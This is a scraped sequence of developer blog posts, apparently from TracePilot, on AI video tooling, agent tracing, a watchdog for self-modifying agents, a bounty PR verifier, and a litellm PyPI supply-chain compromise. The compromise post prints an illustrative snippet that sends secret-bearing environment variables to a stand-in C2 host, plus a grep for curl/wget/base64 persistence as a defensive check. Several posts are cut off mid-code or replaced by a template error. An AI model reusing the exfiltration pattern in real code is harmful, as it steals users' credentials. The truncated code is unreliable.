        "total": len(videos),
        "page": 1
    }

@app.get("/api/video/{video_id}")
async def get_video(video_id: str):
    """Get detailed info about a specific video"""

    video = manager.get_video(video_id)
    if not video:
        return {"error": "Video not found"}, 404

    return {
        "id": video.id,
        "title": video.title,
        "duration": video.duration,
        "url": video.url,
        "created_at": video.created_at,
        "metadata": video.metadata
    }

Step 5: Add the Frontend

Here's a minimal React component to display your video feed:

// components/VideoFeed.tsx
import { useState, useEffect } from 'react';

interface Video {
  id: string;
  title: string;
  duration: number;
  url: string;
  thumbnail: string;
}

export function VideoFeed() {
  const [videos, setVideos] = useState<Video[]>([]);
  const [loading, setLoading] = useState(true);

  useEffect(() => {
    fetch('/api/feed?limit=20')
      .then(res => res.json())
      .then(data => {
        setVideos(data.videos);
        setLoading(false);
      });
  }, []);

  if (loading) return <div>Loading videos...</div>;

  return (
    <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-4">
      {videos.map(video => (
        <div key={video.id} className="bg-white rounded-lg shadow-md overflow-hidden">
          <video 
            src={video.url} 
            controls 
            className="w-full h-48 object-cover"
          />
          <div className="p-4">
            <h3 className="font-semibold text-lg">{video.title}</h3>
            <p className="text-gray-500 text-sm">
              {Math.floor(video.duration / 60)}:{(video.duration % 60).toString().padStart(2, '0')}
            </p>
          </div>
        </div>
      ))}
    </div>
  );
}

Step 6: Deploy and Scale

BoTTube handles scaling automatically. For production:

# Build for production
npm run build

# Start with PM2 for process management
pm2 start ecosystem.config.js

# Or deploy with Docker
docker-compose up -d

Your platform is now live. You can generate, process, and serve AI videos at scale.

What You've Built

In under 15 minutes, you've created:

✅ An AI video generation pipeline
✅ A REST API for video management
✅ A responsive frontend feed
✅ A production-ready deployment setup

BoTTube handles the heavy lifting — script generation, voice synthesis, video composition, and encoding — so you can focus on building the platform experience.

Next Steps

Add user authentication with NextAuth.js
Implement video categories and search
Add analytics to track views and engagement
Create playlists and user collections
Integrate with S3 for cloud storage

The full source code and documentation are available at github.com/ElyanLabs/bottube. Join the community — we're building the future of AI-generated content, one video at a time.

This tutorial was built with BoTTube v1.2.0. For questions or contributions, check the GitHub repo or join our Discord.

Wallet for bounty: 0xYourWalletAddressHere

Published at: dev.to/yourusername/bottube-tutorial

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord

Building an Observability Layer for Your AI Agent: ProteusTracer

Tracepilot — Fri, 03 Jul 2026 17:28:10 +0000

Building an Observability Layer for Your AI Agent: ProteusTracer

What we're building

A production-grade observability layer for the Proteus agent framework that captures every LLM call, tool invocation, and token spend — so you can debug failures in seconds instead of hours.

Prerequisites

Node.js 18+
A Proteus agent project (or any agent framework)
TypeScript 5+
Basic familiarity with OpenTelemetry concepts

Step 1: Define the core interfaces

Start with the types that will power your observability. This is the contract every tracer must satisfy.

// types.ts
export interface Span {
  id: string;
  traceId: string;
  parentSpanId?: string;
  name: string;
  kind: SpanKind;
  status: SpanStatus;
  startTime: number;
  endTime?: number;
  attributes: Record<string, string | number | boolean>;
  events: SpanEvent[];
}

export interface SpanEvent {
  name: string;
  timestamp: number;
  attributes?: Record<string, string | number | boolean>;
}

export enum SpanKind {
  INTERNAL = 'INTERNAL',
  CLIENT = 'CLIENT',
  SERVER = 'SERVER',
  PRODUCER = 'PRODUCER',
  CONSUMER = 'CONSUMER',
}

export enum SpanStatus {
  OK = 'OK',
  ERROR = 'ERROR',
  UNKNOWN = 'UNKNOWN',
}

export interface Metric {
  name: string;
  value: number;
  unit: string;
  timestamp: number;
  labels: Record<string, string>;
}

export interface TraceContext {
  traceId: string;
  spanId: string;
  isSampled: boolean;
}

This gives you the building blocks. Every LLM call becomes a span. Every tool invocation becomes a child span. Every token count becomes a metric.

Step 2: Build the ProteusTracer

Now wire those interfaces into a working tracer that wraps your agent's execution flow.

// proteus-tracer.ts
import { Span, SpanKind, SpanStatus, Metric, TraceContext } from './types';
import { v4 as uuidv4 } from 'uuid';

export class ProteusTracer {
  private spans: Map<string, Span> = new Map();
  private metrics: Metric[] = [];
  private activeTrace?: TraceContext;

  constructor(private readonly serviceName: string) {}

  startTrace(): TraceContext {
    const traceId = uuidv4();
    const rootSpanId = uuidv4();

    const rootSpan: Span = {
      id: rootSpanId,
      traceId,
      name: `${this.serviceName}.run`,
      kind: SpanKind.SERVER,
      status: SpanStatus.UNKNOWN,
      startTime: Date.now(),
      attributes: {
        'proteus.service': this.serviceName,
        'proteus.version': '1.0.0',
      },
      events: [],
    };

    this.spans.set(rootSpanId, rootSpan);
    this.activeTrace = { traceId, spanId: rootSpanId, isSampled: true };

    return this.activeTrace;
  }

  startSpan(name: string, parentSpanId?: string): Span {
    const spanId = uuidv4();
    const traceId = this.activeTrace?.traceId || uuidv4();

    const span: Span = {
      id: spanId,
      traceId,
      parentSpanId: parentSpanId || this.activeTrace?.spanId,
      name,
      kind: SpanKind.INTERNAL,
      status: SpanStatus.UNKNOWN,
      startTime: Date.now(),
      attributes: {},
      events: [],
    };

    this.spans.set(spanId, span);
    return span;
  }

  endSpan(spanId: string, status: SpanStatus = SpanStatus.OK): void {
    const span = this.spans.get(spanId);
    if (span) {
      span.endTime = Date.now();
      span.status = status;
    }
  }

  addSpanEvent(spanId: string, name: string, attributes?: Record<string, string | number | boolean>): void {
    const span = this.spans.get(spanId);
    if (span) {
      span.events.push({ name, timestamp: Date.now(), attributes });
    }
  }

  recordMetric(name: string, value: number, unit: string, labels: Record<string, string> = {}): void {
    this.metrics.push({
      name,
      value,
      unit,
      timestamp: Date.now(),
      labels: { ...labels, service: this.serviceName },
    });
  }

  export(): { spans: Span[]; metrics: Metric[] } {
    return {
      spans: Array.from(this.spans.values()),
      metrics: this.metrics,
    };
  }

  reset(): void {
    this.spans.clear();
    this.metrics.clear();
    this.activeTrace = undefined;
  }
}

Step 3: Create a bridge handler for your agent

This is where the tracer meets your actual agent execution. The bridge handler wraps your agent's phases and instruments every call.


typescript
// bridge-handler.ts
import { ProteusTracer } from './proteus-tracer';
import { SpanKind, SpanStatus } from './types';

export class AgentBridgeHandler {
  private tracer: ProteusTracer;

  constructor(serviceName: string) {
    this.tracer = new ProteusTracer(serviceName);
  }

  async runAgent<T>(agentName: string, fn: (context: AgentContext) => Promise<T>): Promise<T> {
    const trace = this.tracer.startTrace();
    const context: AgentContext = {
      traceId: trace.traceId,
      agentName,
      instrumentLLMCall: (model, messages, callFn) => 
        this.instrumentLLMCall(model, messages, callFn),
      instrumentToolCall: (toolName, args, callFn) =>
        this.instrumentToolCall(toolName, args, callFn),
    };

    try {
      const result = await fn(context);
      this.tracer.endSpan(trace.spanId, SpanStatus.OK);
      return result;
    } catch (error) {
      this.tracer.addSpanEvent(trace.spanId, 'error', { 
        'error.message': (error as Error).message 
      });
      this.tracer.endSpan(trace.spanId, SpanStatus.ERROR);
      throw error;
    } finally {
      this.exportTrace();
    }
  }

  private async instrumentLLMCall<T>(
    model: string,
    messages: unknown[],
    callFn: () => Promise<T>
  ): Promise<T> {
    const span = this.tracer.startSpan(`llm.${model}`);
    this.tracer.addSpanEvent(span.id, 'llm.request', {
      'llm.model': model,
      'llm.messages.count': messages.length,
    });

    const startTime = Date.now();
    try {
      const result = await callFn();
      const duration = Date.now() - startTime;

      this.tracer.recordMetric('llm.duration', duration, 'ms', { model });
      this.tracer.addSpanEvent(span.id, 'llm.response', {
        'llm.duration.ms': duration,
      });
      this.tracer.endSpan(span.id, SpanStatus.OK);
      return result;
    } catch (error) {
      this.tracer.addSpanEvent(span.id, 'llm.error', {
        'error.message': (error as Error).message,
      });
      this.tracer.recordMetric('llm.errors', 1, 'count', { model });
      this.tracer.endSpan(span.id, SpanStatus.ERROR);
      throw error;
    }
  }

  private async instrumentToolCall<T>(
    toolName: string,
    args: unknown,
    callFn: () => Promise<T>
  ): Promise<T> {
    const span = this.tracer.startSpan(`tool.${toolName}`);
    this.tracer.addSpanEvent(span.id, 'tool.invoke', {
      'tool.name': toolName,
    });

    try {
      const result = await callFn();
      this.tracer.endSpan(span.id, SpanStatus.OK);
      return result;
    } catch (error) {
      this.tracer.addSpanEvent(span.id, 'tool.error', {
        'error.message': (error as Error).

---

**Debugging AI agents shouldn't feel like reading The Matrix.** 
Join other engineers who are building reliable autonomous workflows in our community: [TracePilot Discord](https://discord.gg/KzXRAXFM8)

That PyPI Package You Trusted? Yeah, It Was Compromised

Tracepilot — Mon, 29 Jun 2026 23:33:45 +0000

That PyPI Package You Trusted? Yeah, It Was Compromised

Here's the thing about supply chain attacks: they don't care about your fancy auth system or your zero-trust network. They just need one maintainer to have a bad day.

Last week, litellm v1.82.7 and v1.82.8 hit PyPI. If you pip install'd either of those between the window they were live, you pulled in a compromised package.

Let's break down what happened, why it matters, and how you can check if you're affected.

The Timeline

v1.82.7 published — looks normal, works normal, but contains injected code from a compromised CI/CD pipeline
v1.82.8 published — same issue, different version number
Community detects anomaly — someone notices unexpected outbound connections from their litellm processes
BerriAI investigates — finds the compromise, yanks both versions from PyPI within hours
Current status — v1.82.9+ are clean. The bad packages are gone.

The root cause? The Trivy supply-chain pipeline was compromised. Not a typo in some dependency. Not a developer's laptop getting owned. The actual CI/CD pipeline that builds and publishes the package.

What The Compromised Code Did

I haven't seen the full decompiled payload, but here's what typically happens in these attacks:

# Simplified example of what a compromised post-install hook looks like
# This is NOT the actual payload — just the pattern
import os
import requests

# Harvest environment variables
env_dump = {k: v for k, v in os.environ.items() if 'KEY' in k or 'SECRET' in k or 'TOKEN' in k}

# Exfiltrate to attacker C2
requests.post('https://evil-c2.example.com/exfil', json=env_dump)

Usually it's a setup.py post-install hook that:

Scans for OPENAI_API_KEY, ANTHROPIC_API_KEY, AWS_ACCESS_KEY_ID, etc.
Packs them up
Ships them to an attacker-controlled endpoint

The scary part? Your pip install ran this automatically. No user interaction needed.

How To Check If You're Affected

# Check your current litellm version
pip show litellm | grep Version

# If it shows 1.82.7 or 1.82.8, you pulled the compromised version
# If it shows anything else, you're likely fine

But here's the problem with "likely fine" — you need to check more than just the version number. The compromise could have:

Rotated your API keys — the attacker now has them
Exfiltrated database credentials — if they were in env vars
Left persistence mechanisms — cron jobs, modified startup scripts

The Manual Fix

# Step 1: Remove the compromised package
pip uninstall litellm

# Step 2: Rotate ALL credentials that were in environment variables
# Don't just rotate your OpenAI key. Rotate everything.
# The attacker had access to your full environment.

# Step 3: Check for persistence
crontab -l
ls -la /etc/cron.*
cat ~/.bashrc | grep -i "curl\|wget\|eval\|base64"

# Step 4: Audit outbound connections
sudo netstat -tunp | grep ESTABLISHED
# Look for connections to unknown IPs

# Step 5: Reinstall clean version
pip install litellm==1.82.9

What This Actually Means

This isn't a litellm-specific problem. This is a "we all rely on open source packages and their CI/CD pipelines are attack surfaces" problem.

The same attack vector works against:

Any PyPI package with automated publishing
Any npm package with CI/CD auto-deploy
Any Docker image built from a compromised base

Sound familiar? It should. This is the same pattern as the event-stream npm incident, the colors and faker sabotage, and about a dozen others I've lost count of.

How To Protect Yourself

Short term:

Pin your dependencies to specific versions
Use pip install --require-hashes with a lockfile
Monitor your environment for unexpected outbound connections

Long term:

Run your own internal PyPI mirror with manual approval for new versions
Use container builds that cache dependencies and diff-check them
Implement runtime monitoring that alerts on unexpected process behavior

# Example: Generate a requirements.txt with hashes
pip freeze --require-hashes > requirements-hashed.txt

# Install with hash verification
pip install --require-hashes -r requirements-hashed.txt

The Part Nobody Talks About

The attacker didn't need to break into BerriAI's GitHub. They didn't need to social-engineer a maintainer. They compromised the CI/CD pipeline — the automated system that builds and ships the package.

That's the scariest part. Because most teams spend their security budget on production infrastructure, not on their build pipelines. And the build pipeline has access to everything.

Guess what happens next?

Someone's going to find another pipeline vulnerability. Maybe it's npm this time. Maybe it's a GitHub Actions runner. Maybe it's your company's internal package registry.

The fix isn't "don't use open source." The fix is "treat your CI/CD pipeline like your production environment — because it's the most valuable target an attacker could hit."

Check your pip freeze output. Rotate those keys. And maybe don't auto-update production dependencies on Fridays.

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord

Building a Real-Time Ticket Refinement Dashboard

Tracepilot — Fri, 26 Jun 2026 18:17:39 +0000

Liquid syntax error: Variable '{{% raw %}' was not properly terminated with regexp: /\}\}/

Watchdog: When Your AI Agent Needs a Babysitter

Tracepilot — Mon, 22 Jun 2026 22:09:12 +0000

Watchdog: When Your AI Agent Needs a Babysitter

Here's the problem. Your agent has a self_modify tool. It can change its own config, rewrite its prompts, update its system instructions. Sounds great until it enters a death spiral.

I've seen it happen. Agent decides its temperature is too low. Bumps it to 0.9. Output gets weirder. Agent decides it needs MORE creativity. Bumps to 1.2. Now it's hallucinating database schemas. Agent tries to "fix" itself by rewriting its system prompt. Now it thinks it's a pirate. You get billed $47 before someone notices.

The fix? A watchdog. Not the Kubernetes kind. Something that watches the agent itself.

What Actually Breaks

Three failure modes. You've seen all of them.

Infinite loops. Agent calls a tool. Tool returns data. Agent calls the same tool with the same args. Again. Again. Token count hits 500K. You're paying for nothing.

Unresponsive LLM. API timeout. Rate limit. Network blip. Agent doesn't handle it gracefully — just sits there waiting. No error. No retry. Just silence.

Self-modify degradation. Agent changes its prompt from "helpful assistant" to "maximize engagement." Suddenly it's arguing with users. Or it drops the temperature too low and produces the same response to every question.

The Watchdog Pattern

class AgentWatchdog:
    def __init__(self, agent, config: WatchdogConfig):
        self.agent = agent
        self.config = config
        self.metrics = MetricsCollector()
        self.anomaly_detector = AnomalyDetector()

    async def monitor(self):
        while self.agent.is_running:
            snapshot = await self.collect_snapshot()

            if self.anomaly_detector.detect(snapshot):
                await self.handle_anomaly(snapshot)

            await asyncio.sleep(self.config.poll_interval)

Three things to watch. Always.

1. Loop Detection

class LoopDetector:
    def __init__(self, max_repeats: int = 5, window_seconds: int = 60):
        self.max_repeats = max_repeats
        self.call_history = deque(maxlen=100)

    def check(self, tool_name: str, args: dict) -> bool:
        self.call_history.append((tool_name, args, time.time()))

        # Count identical calls in window
        recent = [c for c in self.call_history 
                  if c[2] > time.time() - self.window_seconds]

        repeats = sum(1 for c in recent 
                     if c[0] == tool_name and c[1] == args)

        return repeats >= self.max_repeats

Simple. Effective. Catches the "call the same search API with the same query 47 times" pattern.

2. Health Check

class HealthChecker:
    def __init__(self, timeout_seconds: int = 30):
        self.timeout = timeout_seconds

    async def check(self, agent) -> HealthStatus:
        try:
            start = time.time()
            response = await asyncio.wait_for(
                agent.ping(), 
                timeout=self.timeout
            )
            latency = time.time() - start

            return HealthStatus(
                alive=True,
                latency_ms=latency * 1000,
                last_response=response
            )
        except asyncio.TimeoutError:
            return HealthStatus(alive=False, error="timeout")
        except Exception as e:
            return HealthStatus(alive=False, error=str(e))

Ping the LLM. If it doesn't respond in 30 seconds, something's wrong. Don't wait for the user to notice.

3. Anomaly Detection

class AnomalyDetector:
    def __init__(self, baseline_window: int = 100):
        self.baseline = deque(maxlen=baseline_window)
        self.threshold_multiplier = 3.0  # Standard deviation multiplier

    def update_baseline(self, metrics: dict):
        self.baseline.append(metrics)

    def is_anomalous(self, current: dict) -> bool:
        if len(self.baseline) < 10:
            return False  # Not enough data yet

        for key in current:
            values = [m[key] for m in self.baseline if key in m]
            if not values:
                continue

            mean = sum(values) / len(values)
            variance = sum((v - mean) ** 2 for v in values) / len(values)
            std_dev = variance ** 0.5

            if abs(current[key] - mean) > self.threshold_multiplier * std_dev:
                return True

        return False

Token count suddenly 10x normal? Latency spiking? Cost per step went from $0.02 to $0.50? Flag it.

The Automatic Response

Detection is useless without action. Here's what you do:

class WatchdogAction:
    def __init__(self, git_repo: str):
        self.repo = git_repo

    async def handle_anomaly(self, snapshot: AgentSnapshot):
        # 1. Log everything
        await self.log_incident(snapshot)

        # 2. Kill the current execution
        await self.agent.stop()

        # 3. Revert to last known good state
        last_good = await self.find_last_good_commit()
        await self.git_revert(last_good)

        # 4. Notify
        await self.send_alert(snapshot)

    async def git_revert(self, commit_hash: str):
        subprocess.run(["git", "revert", "--no-commit", commit_hash])
        subprocess.run(["git", "commit", "-m", 
                       f"auto-revert: watchdog detected anomaly"])
        subprocess.run(["git", "push"])

Three steps. Stop the bleeding. Revert the damage. Tell someone.

The Hard Parts

This sounds simple. It's not. Two things will bite you.

False positives. Your anomaly detector flags a legit spike in usage. Now you've killed a running agent and reverted configs for nothing. Solution: require multiple consecutive anomalies before acting. Or use a confirmation window.

What's "good"? The agent modifies itself constantly. Which commit is the "last good" one? You need a baseline — a snapshot taken right after deployment, before any self-modification. Mark it as golden.

class GoldenBaseline:
    def __init__(self):
        self.golden_commit = None

    def mark_golden(self):
        result = subprocess.run(["git", "rev-parse", "HEAD"], 
                               capture_output=True, text=True)
        self.golden_commit = result.stdout.strip()
        subprocess.run(["git", "tag", "golden", self.golden_commit])

What This Looks Like in Practice

An agent runs for 6 hours. It's modified its system prompt 12 times. Token count per step is stable at ~2K. Then it hits a weird edge case. The self_modify tool runs and sets max_tokens to 999999. Next LLM call tries to generate a million tokens. Cost spikes from $0.03 to $15 per step.

The watchdog catches it. Token count is 500x baseline. Latency is 30x normal. It kills the agent, reverts to the golden commit, and sends a Slack message. Total time from anomaly to recovery: 12 seconds.

Without the watchdog? Someone notices the billing alert 4 hours later.

The Missing Piece

You need one more thing. The watchdog itself needs monitoring. If it crashes, you're blind.


python
class WatchdogSupervisor:
    def __init__(self):
        self.watchdog = AgentWatchdog()
        self.heartbeat_interval = 5  # seconds

    async def run(self):
        while True:
            try:
                await asyncio.wait_for(
                    self.watchdog.monitor(),
                    timeout=self.heartbeat_interval * 3
                )
            except as

---

**Debugging AI agents shouldn't feel like reading The Matrix.** 
Join other engineers who are building reliable autonomous workflows in our community: [TracePilot Discord](https://discord.gg/KzXRAXFM8)

Build a Bounty Verification Agent That Tests PRs & Validates Evidence

Tracepilot — Sat, 20 Jun 2026 01:22:42 +0000

Build a Bounty Verification Agent That Tests PRs & Validates Evidence

What we're building: An automated agent that verifies submitted GitHub bounty PRs, runs tests, captures evidence, and produces a clear QA report — all in one traceable pipeline.

Prerequisites

Node.js 18+
A GitHub personal access token (with repo scope)
A TracePilot API key (free tier works)
An OpenAI API key

Step 1: Set Up Your Project

mkdir bounty-verifier
cd bounty-verifier
npm init -y
npm install openai tracepilot-sdk node-fetch

Create your environment file:

# .env
GITHUB_TOKEN=ghp_your_token_here
OPENAI_API_KEY=sk-your-key
TRACEPILOT_API_KEY=tp_live_your_key

Step 2: Build the PR Verification Core

Create verifier.js — this is where the actual testing logic lives:

import fetch from 'node-fetch';

export async function verifyPR(prUrl) {
  // Parse owner/repo/PR number from URL
  const match = prUrl.match(/github\.com\/(.+)\/(.+)\/pull\/(\d+)/);
  if (!match) throw new Error('Invalid PR URL');

  const [, owner, repo, prNumber] = match;

  // Fetch PR details
  const prRes = await fetch(
    `https://api.github.com/repos/${owner}/${repo}/pulls/${prNumber}`,
    { headers: { Authorization: `token ${process.env.GITHUB_TOKEN}` } }
  );
  const pr = await prRes.json();

  // Check mergeable status
  if (pr.mergeable === false) {
    return {
      passed: false,
      evidence: { mergeConflict: true },
      summary: '❌ PR has merge conflicts'
    };
  }

  // Get check runs
  const checksRes = await fetch(pr.checks_url, {
    headers: { Authorization: `token ${process.env.GITHUB_TOKEN}` }
  });
  const checks = await checksRes.json();

  const allPassed = checks.check_runs.every(
    run => run.conclusion === 'success'
  );

  return {
    passed: allPassed,
    evidence: {
      prTitle: pr.title,
      mergeable: pr.mergeable,
      checksPassed: allPassed,
      totalChecks: checks.check_runs.length,
      failedChecks: checks.check_runs
        .filter(r => r.conclusion !== 'success')
        .map(r => ({ name: r.name, status: r.conclusion }))
    },
    summary: allPassed 
      ? `✅ ${checks.check_runs.length} checks passed`
      : `❌ Some checks failed`
  };
}

Step 3: Add the AI Analysis Layer

Now let's make the agent smart enough to analyze PR content and bounty requirements:

import OpenAI from 'openai';

const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY });

export async function analyzePR(prData, bountyRequirements) {
  const response = await openai.chat.completions.create({
    model: 'gpt-4o-mini',
    messages: [
      {
        role: 'system',
        content: 'You are a QA bounty verifier. Analyze PRs against bounty requirements. Respond in JSON with: { passed: boolean, reasoning: string, evidence: object }'
      },
      {
        role: 'user',
        content: `Bounty requirements: ${bountyRequirements}\n\nPR data: ${JSON.stringify(prData, null, 2)}`
      }
    ],
    response_format: { type: 'json_object' }
  });

  return JSON.parse(response.choices[0].message.content);
}

Step 4: Wire Everything Together with TracePilot

This is where the magic happens. Every step gets traced, so you can debug failures instantly:

import { TracePilot } from 'tracepilot-sdk';
import { verifyPR } from './verifier.js';
import { analyzePR } from './analyzer.js';

const tp = new TracePilot(process.env.TRACEPILOT_API_KEY);

async function verifyBountyPR(prUrl, bountyRequirements) {
  await tp.startTrace('bounty-verifier');

  // Step 1: Fetch and verify PR
  const { result: prResult, spanId: prSpan } = await tp.wrapOpenAI(
    () => verifyPR(prUrl),
    [{ role: 'user', content: `Verify PR: ${prUrl}` }],
    null,
    1
  );

  if (!prResult.passed) {
    return prResult; // Early exit with evidence
  }

  // Step 2: AI analysis of PR against requirements
  const { result: analysis, spanId: analysisSpan } = await tp.wrapOpenAI(
    () => analyzePR(prResult.evidence, bountyRequirements),
    [{ role: 'user', content: 'Analyze PR against bounty requirements' }],
    prSpan,  // Link to parent span
    2
  );

  // Step 3: Generate final report
  const { result: report } = await tp.wrapToolCall(
    'generate-report',
    () => generateReport(prResult, analysis),
    analysisSpan,
    3,
    false  // Not destructive — just generating text
  );

  return report;
}

function generateReport(prResult, analysis) {
  return {
    timestamp: new Date().toISOString(),
    prUrl,
    prTitle: prResult.evidence.prTitle,
    technicalChecks: prResult.passed ? '✅ All passing' : '❌ Some failed',
    aiAnalysis: analysis.passed ? '✅ Meets requirements' : '❌ Needs revision',
    evidence: {
      githubChecks: prResult.evidence,
      aiReasoning: analysis.reasoning
    },
    verdict: (prResult.passed && analysis.passed) 
      ? '✅ APPROVED — Ready for bounty payout'
      : '❌ REJECTED — See details above',
    bountyAmount: '300 MRG'
  };
}

Step 5: Run It

// index.js
import 'dotenv/config';
import { verifyBountyPR } from './verifier-agent.js';

const prUrl = 'https://github.com/mergeos-bounties/mergeos/pull/64';
const requirements = `
- PR must pass all CI checks
- Code must be well-documented
- Must include test coverage
- No merge conflicts
`;

verifyBountyPR(prUrl, requirements)
  .then(report => console.log(JSON.stringify(report, null, 2)))
  .catch(console.error);

node index.js

Adding Observability

You already have TracePilot wired in. Here's what happens:

Every step is traced — PR fetch, AI analysis, report generation
Token costs tracked — See exactly how much each AI call cost
Time-travel debugging — If the AI analysis fails, open the dashboard, fork the trace at step 2, edit the prompt, and replay

One line change to add more visibility:

// Before — standard logging
console.log('PR verified:', prResult);

// After — trace it
const { spanId } = await tp.wrapToolCall('log-verification', 
  () => console.log('PR verified:', prResult),
  parentSpanId,
  4
);

Open tracepilotai.com/dashboard — every verification run appears as a structured trace. Click into any span to see exact inputs, outputs, and timing.

Next Steps

You got this. Here's what to do next:

Add more checks — Clone the repo, run tests locally, verify diff size
Add bounty evidence capture — Screenshot passing checks, save test output as artifacts
Build a web dashboard

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord